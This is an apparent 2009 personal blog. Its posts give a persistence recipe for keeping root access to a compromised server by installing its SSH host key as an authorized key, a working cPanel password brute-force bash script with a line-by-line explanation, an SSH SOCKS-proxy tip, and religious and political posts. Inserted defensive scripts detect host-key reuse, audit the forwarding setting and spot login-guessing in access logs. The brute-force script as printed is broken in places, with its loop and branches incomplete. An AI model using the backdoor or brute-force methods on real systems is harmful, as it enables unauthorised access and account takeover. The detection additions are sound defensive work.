Thursday, January 29, 2009

legal Backdoor

Some hackers gain root privileges on a secure server but can't install a rootkit or backdoor, so what do they do?

Actually, they can log in to the server at any time without knowing the root password!!!

By using an RSA or DSA private key to log in.

On Server Side:
  • copy the public key "/etc/ssh/ " to "~/.ssh/authorized_keys" with chmod 600
#cp /etc/ssh/ ~/.ssh/authorized_keys
#chmod 600 ~/.ssh/authorized_keys

On Client Side:
  • save the private key "/etc/ssh/ssh_host_dsa_key" to your machine with chmod 600
  • use it with SSH option "-i" to login without password.
#chmod 600 ssh_host_dsa_key

#ssh root@ -i ssh_host_dsa_key

For Windows Users:
  • copy the content of the private key "/etc/ssh/ssh_host_dsa_key" into Windows Notepad
  • load it in puttygen.exe and save it again with the .ppk extension
  • select the key under putty>connection>SSH>Auth

and enjoy logging in without a password ;)
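
The setup above leaves a plain artifact on the server: an authorized_keys entry whose key blob equals one of the server's own host public keys. The following check for that is an added example, not part of the original post; the function name is hypothetical and the sample keys are constructed placeholders.

```shell
#!/bin/sh
# Added example: flag authorized_keys entries that reuse an SSH host public key.
# find_hostkey_reuse (hypothetical name) HOSTKEY_DIR AUTHORIZED_KEYS
# Prints one line per matching entry; exit status 0 if any match, 1 if none.
find_hostkey_reuse() {
    cat "$1"/ssh_host_*_key.pub 2>/dev/null |
    awk -v auth="$2" '
        # Return the base64 key blob: the field after the key-type token.
        # Scanning for the type skips leading options such as from="...".
        function blob(line,    n, f, i) {
            n = split(line, f, /[ \t]+/)
            for (i = 1; i < n; i++)
                if (f[i] ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp[0-9]+)$/)
                    return f[i + 1]
            return ""
        }
        { b = blob($0); if (b != "") host[b] = 1 }   # stdin: host public keys
        END {
            found = 0
            while ((getline line < auth) > 0) {
                ln++
                if (line ~ /^[ \t]*(#|$)/) continue
                b = blob(line)
                if (b != "" && (b in host)) {
                    print auth ":" ln ": entry matches an SSH host public key"
                    found = 1
                }
            }
            exit(found ? 0 : 1)
        }'
}

# Constructed sample data (placeholder blobs, not real keys).
hk_demo=$(mktemp -d)
echo 'ssh-dss AAAAB3NzaC1kc3MAAACBAHOSTKEYSAMPLE root@server' > "$hk_demo/ssh_host_dsa_key.pub"
cat > "$hk_demo/authorized_keys" <<'EOF'
# admin key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABADMINKEYSAMPLE admin@laptop
from="192.0.2.10" ssh-dss AAAAB3NzaC1kc3MAAACBAHOSTKEYSAMPLE
EOF
find_hostkey_reuse "$hk_demo" "$hk_demo/authorized_keys" || echo "no host key reuse found"
```

Run it against every account's authorized_keys file; if a host private key may have been copied off the machine, regenerate the host keys as well as removing the entry.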

Wednesday, January 21, 2009

"But you prefer the worldly life, while the Hereafter is better and more enduring"

Work for your worldly life as if you will live forever, and work for your Hereafter as if you will die tomorrow

Sunday, January 18, 2009

Create your own socks5 proxy

Do you know that you can create your own socks5 proxy with just one command:

ssh -f -N -D 5050 "USERNAME"

The -f and -N options just run ssh in the background without executing a remote command; the important option is -D.

From the FreeBSD ssh(1) man page:

-D [bind_address:]port

Specifies a local "dynamic" application-level port forwarding. This works by allocating a socket to listen to port on the local side.

Windows users can do it with PuTTY:

C:\>putty.exe -ssh "USERNAME" -pw "PASSWORD" -P 22 -D 5050

What we did is connect to an SSH server (it could be your remote Linux or Unix server, or a free shell account you have) and give it the option to create a tunnel with port forwarding for port 5050.

If you set your browser to use a socks5 proxy with the address and port 5050, the traffic will be forwarded to the tunnel and you will browse the internet through the remote SSH server.

To disable port forwarding on your server, edit /etc/ssh/sshd_config
and change "AllowTcpForwarding yes" to "no".
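
When checking that setting, note that sshd uses the first value it obtains for a keyword and that a Match block can turn forwarding back on for some accounts. The audit below is an added example, not part of the original post; the function name is hypothetical and the configuration it parses is a constructed sample.

```shell
#!/bin/sh
# Added example: report the AllowTcpForwarding values set in an sshd_config file.
# audit_tcp_forwarding (hypothetical name) FILE
# Assumes a single file with no Include directives; "sshd -T" on the server
# remains the authoritative view of the effective configuration.
audit_tcp_forwarding() {
    awk '
        /^[ \t]*(#|$)/ { next }                      # skip comments and blanks
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            split(line, f, /[ \t=]+/)                # "Keyword value" or "Keyword=value"
            kw = tolower(f[1]); val = f[2]           # keywords are case-insensitive
            if (kw == "match") { inmatch = 1; ctx = line; next }
            if (kw != "allowtcpforwarding") next
            if (inmatch) over[++k] = "match " val " (" ctx ")"
            else if (global == "") global = val      # first value obtained wins
        }
        END {
            # sshd defaults to "yes" when the keyword is absent.
            print "global " (global == "" ? "yes (default)" : global)
            for (i = 1; i <= k; i++) print over[i]
        }' "$1"
}

# Constructed sample: the later global "yes" is ignored, but the Match block
# re-enables forwarding for one account.
fwd_cfg=$(mktemp)
cat > "$fwd_cfg" <<'EOF'
Port 22
AllowTcpForwarding no
AllowTcpForwarding yes
Match User tunnel
    AllowTcpForwarding yes
EOF
audit_tcp_forwarding "$fwd_cfg"
```

sshd_config(5) itself notes that disabling TCP forwarding does not improve security unless users are also denied shell access, since they can install their own forwarders.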


Wednesday, January 14, 2009

how to build your own BruteForce tool using linux shell script

Hello, did you ever try to brute force a website login page and you didn't find the right tool?
It always happens, so I will explain how I did it with a Linux shell script.

I wrote a small script to brute force cPanel accounts:
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]
# This is a simple script that will brute force Cpanel account
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|


".::Cpanel BruteForcer By Dr.Death::."
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
echo "brute force complete"
echo "no luck, try better dictionary"

Let's explain what we did:

  • #!/usr/bin/env bash
This executes the script with the bash shell found through the environment ("env").

  • read site
This stores the user input in the variable "$site", which will be the website domain name.

  • n=`cat pass_list | wc -l`
This counts the lines in the file "pass_list", which holds the password list.

  • for (( i=1; i <= $n; i++));
We use the number stored in "$n" as the bound of a for loop, so for example if the file pass_list has 1000 passwords in it, the loop runs 1000 times to try all the passwords.

  • password=`sed -n "$i"p pass_list`
Here we use "sed", the stream editor, with the command "p" to print one password from pass_list in each iteration.
For example, in loop number 4 the variable $i has the value 4 and the sed command looks like this:
"sed -n 4p pass_list", which prints the 4th line of the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
Here we use "lynx", the Linux command-line browser, as a socket to connect to the target website.
We use the option "-dump" to dump the output instead of waiting for user action, "-nolist" to disable the link list feature in dumps, and "-auth=" to set the authorization ID and password for protected documents.
For example, to access the cPanel account for website "" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass"

So the password file pass_list should contain the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
Here we use an if statement with the test "! -z", which means: if the value of "$b" is not empty, we are logged in, the password is the value of the variable "$password" in the current iteration, and the script exits successfully; otherwise the loop continues.

That's all, folks :)
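
On the server side, a loop like this shows up as a run of HTTP 401 responses from one address, sometimes ending in a successful authenticated request. The detector below is an added example, not part of the original post; the function name is hypothetical, and the log lines are constructed in Apache-style common log format, which is an assumption about the target's logging.

```shell
#!/bin/sh
# Added example: spot password-guessing runs in a web access log.
# detect_auth_guessing (hypothetical name) LOGFILE [MIN_FAILURES]
# Assumes Apache-style common log format: field 1 = client IP, field 3 =
# authenticated user, field 9 = HTTP status.
# Prints "IP FAILURES OUTCOME", sorted by IP.
detect_auth_guessing() {
    awk -v min="${2:-5}" '
        $9 == 401 { fail[$1]++; next }               # rejected credentials
        # A 2xx with an authenticated user after enough failures from the
        # same address suggests a guess finally succeeded.
        $9 ~ /^2/ && $3 != "-" && ($1 in fail) && fail[$1] >= min && !($1 in hit) {
            hit[$1] = $3
        }
        END {
            for (ip in fail) {
                if (fail[ip] < min) continue
                outcome = (ip in hit) ? "then-success user=" hit[ip] : "no-success"
                print ip, fail[ip], outcome
            }
        }' "$1" | sort
}

# Constructed sample log (documentation IP ranges, not real traffic).
bf_log=$(mktemp)
cat > "$bf_log" <<'EOF'
203.0.113.7 - user [14/Jan/2009:10:00:01 +0000] "GET / HTTP/1.0" 401 401
203.0.113.7 - user [14/Jan/2009:10:00:02 +0000] "GET / HTTP/1.0" 401 401
203.0.113.7 - user [14/Jan/2009:10:00:03 +0000] "GET / HTTP/1.0" 401 401
203.0.113.7 - user [14/Jan/2009:10:00:04 +0000] "GET / HTTP/1.0" 200 5120
198.51.100.4 - bob [14/Jan/2009:10:05:00 +0000] "GET / HTTP/1.0" 401 401
192.0.2.20 - alice [14/Jan/2009:10:06:00 +0000] "GET / HTTP/1.0" 200 5120
EOF
detect_auth_guessing "$bf_log" 3
```

An address reported with "then-success" is the case to act on first: reset that account's password and review what the session did.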

Monday, January 12, 2009

There is no power and no strength except with God

And we call ourselves men!!!!

GAZA We Will Never Forget You

I saw the images and they were disturbing. Images are of the Israeli assault against civilians in Gaza. I did not imagine things in Gaza are going as they are; therefore I forwarded it on to you so that you witness the crimes against humanity that the Israelis carry out.

Visit this site to see what really happens there:

Read these words from the Holy Quran, and compare them with the current situation

Sunday, January 11, 2009

The Gulf Cup 19 website was hacked

Poor hacker, he has no other recourse
Anyway, congratulations to the Omani national team on winning the championship, and hard luck to the rest

Saturday, January 10, 2009